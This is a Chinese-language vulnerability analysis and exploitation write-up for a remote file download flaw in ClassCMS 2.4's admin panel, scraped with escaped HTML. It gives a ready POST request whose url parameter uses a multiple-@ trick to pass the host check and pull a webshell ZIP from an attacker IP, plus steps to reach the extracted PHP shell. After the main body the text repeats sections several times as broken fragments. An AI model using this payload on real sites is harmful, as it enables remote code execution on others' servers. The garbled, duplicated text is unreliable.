ClassCMS 2.4 远程文件下载漏洞分析与利用<\/h1>

漏洞概述<\/h2>
ClassCMS 2.4 版本在后台管理系统中存在一个远程文件下载漏洞，攻击者可以通过构造特殊的URL绕过主机名验证，实现任意文件下载并解压，最终可能导致远程代码执行。<\/p>

漏洞位置<\/h2>

后台管理模块中的"应用管理->应用下载"功能：<\/p>

http:\/\/[target]\/admin666?do=shop:downloadClass&ajax=1
<\/code><\/pre>
漏洞条件<\/h2>

需要后台管理员权限<\/li>
目标服务器需要安装并启用php_zip扩展<\/li>
<\/ol>
漏洞分析<\/h2>
关键代码路径<\/h3>
漏洞主要存在于以下文件中：<\/p>

\/class\/shop\/shop.php<\/code> 中的 downloadClass()<\/code> 和 download()<\/code> 函数<\/li>
<\/ul>
漏洞原理<\/h3>


主机名验证绕过<\/strong>：<\/p>

系统使用parse_url()<\/code>解析URL获取主机名<\/li>
但实际下载时使用curl库解析URL<\/li>
两者对包含多个@<\/code>符号的URL解析方式不同<\/li>
<\/ul>
<\/li>

下载与解压流程<\/strong>：<\/p>

下载的文件会被保存到缓存目录<\/li>
然后解压到\/class\/{classhash}\/<\/code>目录下<\/li>
<\/ul>
<\/li>
<\/ol>
关键代码片段<\/h3>
function<\/span> download<\/span>($url,$filepath) {
<\/span><\/span>    $hosts=<\/span>array_merge<\/span>(explode<\/span>(';'<\/span>,C<\/span>('this:defaultHost'<\/span>)),array<\/span>(config<\/span>('host'<\/span>)));
<\/span><\/span>    if<\/span>($defaulthost=<\/span>config<\/span>('defaulthost'<\/span>)) {
<\/span><\/span>        $hosts=<\/span>array_merge<\/span>($hosts,explode<\/span>(';'<\/span>,$defaulthosts));
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    $checkurl=<\/span>parse_url<\/span>($url);
<\/span><\/span>    if<\/span>(!<\/span>isset<\/span>($checkurl['host'<\/span>]) ||<\/span> !<\/span>in_array<\/span>($checkurl['host'<\/span>],$hosts)) {
<\/span><\/span>        Return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 实际下载操作...
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
利用步骤<\/h3>

准备一个包含恶意PHP文件的ZIP压缩包（如shell.zip<\/code>包含shell.php<\/code>）<\/li>
构造特殊的URL绕过主机名验证<\/li>
发送恶意请求触发下载<\/li>
访问解压后的恶意文件执行代码<\/li>
<\/ol>
利用Payload<\/h3>
请求包示例<\/strong>：<\/p>
POST \/admin666?do=shop:downloadClass&ajax=1 HTTP\/1.1
Host: target.com
Content-Type: application\/x-www-form-urlencoded; charset=UTF-8
Cookie: [有效的管理员cookie]

classhash=test&url=http:\/\/@attacker-ip:80@classcms.com\/shell.zip&csrf=[有效的CSRF令牌]
<\/code><\/pre>
关键参数说明<\/h3>

classhash<\/code>: 解压后的目录名<\/li>
url<\/code>: 构造的特殊URL格式：

http:\/\/@[攻击者IP]:[端口]@classcms.com\/[文件名].zip<\/code><\/li>
<\/ul>
<\/li>
csrf<\/code>: 有效的CSRF令牌<\/li>
<\/ul>
漏洞验证<\/h2>


黑盒测试<\/strong>：<\/p>

修改URL参数尝试下载外部文件<\/li>
观察返回信息："安装包格式错误，请重试"表示下载成功但解压验证失败<\/li>
<\/ul>
<\/li>

白盒测试<\/strong>：<\/p>

本地搭建环境调试parse_url()<\/code>与curl的解析差异<\/li>
验证绕过逻辑的有效性<\/li>
<\/ul>
<\/li>
<\/ol>
影响版本<\/h2>
ClassCMS 2.4及可能更早版本<\/p>
修复建议<\/h2>

升级到最新版本<\/li>
临时修复方案：

修改\/class\/shop\/shop.php<\/code>中的download()<\/code>函数<\/li>
添加对URL中@<\/code>符号的检查<\/li>
使用更严格的主机名验证机制<\/li>
<\/ul>
<\/li>
<\/ol>
技术细节<\/h2>
parse_url与curl解析差异<\/h3>

parse_url()<\/code>: 解析最后一个@<\/code>之后的内容作为host<\/li>
curl<\/code>: 解析第一个@<\/code>之后的内容作为host<\/li>
<\/ul>
受影响PHP版本<\/h3>
在较新版本的curl(curl>=7.54.0)中已修复多个@<\/code>的解析问题，使用多个@<\/code>会报错。<\/p>
漏洞证明<\/h2>
成功利用后，恶意文件将存在于：<\/p>
http:\/\/target.com\/class\/[classhash值]\/[恶意文件名].php
<\/code><\/pre>
参考<\/h2>

Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li>
CURL漏洞CVE-2017-1000257<\/li>
<\/ul>

ClassCMS 2.4 远程文件下载漏洞分析与利用<\/h1>

漏洞概述<\/h2>
ClassCMS 2.4 版本在后台管理系统中存在一个远程文件下载漏洞，攻击者可以通过构造特殊的URL绕过主机名验证，实现任意文件下载并解压，最终可能导致远程代码执行。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

影响版本<\/h2>
ClassCMS 2.4及可能更早版本<\/p>

技术细节<\/h2>

受影响PHP版本<\/h3>
在较新版本的curl(curl>=7.54.0)中已修复多个`@<\/code>的解析问题，使用多个@<\/code>会报错。<\/p>`

`漏洞证明<\/h2> 成功利用后，恶意文件将存在于：<\/p> http:\/\/target.com\/class\/[classhash值]\/[恶意文件名].php <\/code><\/pre> 参考<\/h2> Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li> CURL漏洞CVE-2017-1000257<\/li> <\/ul>`

参考<\/h2>

Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li>
CURL漏洞CVE-2017-1000257<\/li> <\/ul>

ClassCMS 2.4 远程文件下载漏洞分析与利用<\/h1>

漏洞概述<\/h2> ClassCMS 2.4 版本在后台管理系统中存在一个远程文件下载漏洞，攻击者可以通过构造特殊的URL绕过主机名验证，实现任意文件下载并解压，最终可能导致远程代码执行。<\/p>

漏洞分析<\/h2>

漏洞利用<\/h2>

影响版本<\/h2> ClassCMS 2.4及可能更早版本<\/p>

技术细节<\/h2>

受影响PHP版本<\/h3> 在较新版本的curl(curl>=7.54.0)中已修复多个@<\/code>的解析问题，使用多个@<\/code>会报错。<\/p>

漏洞证明<\/h2> 成功利用后，恶意文件将存在于：<\/p> http:\/\/target.com\/class\/[classhash值]\/[恶意文件名].php <\/code><\/pre> 参考<\/h2> Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li> CURL漏洞CVE-2017-1000257<\/li> <\/ul>

参考<\/h2> Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li> CURL漏洞CVE-2017-1000257<\/li> <\/ul>

漏洞概述<\/h2>
ClassCMS 2.4 版本在后台管理系统中存在一个远程文件下载漏洞，攻击者可以通过构造特殊的URL绕过主机名验证，实现任意文件下载并解压，最终可能导致远程代码执行。<\/p>

影响版本<\/h2>
ClassCMS 2.4及可能更早版本<\/p>

受影响PHP版本<\/h3>
在较新版本的curl(curl>=7.54.0)中已修复多个`@<\/code>的解析问题，使用多个@<\/code>会报错。<\/p>`

`漏洞证明<\/h2> 成功利用后，恶意文件将存在于：<\/p> http:\/\/target.com\/class\/[classhash值]\/[恶意文件名].php <\/code><\/pre> 参考<\/h2> Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li> CURL漏洞CVE-2017-1000257<\/li> <\/ul>`

参考<\/h2>

Black Hat 2017: "A New Era of SSRF" by Orange Tsai<\/li>
CURL漏洞CVE-2017-1000257<\/li> <\/ul>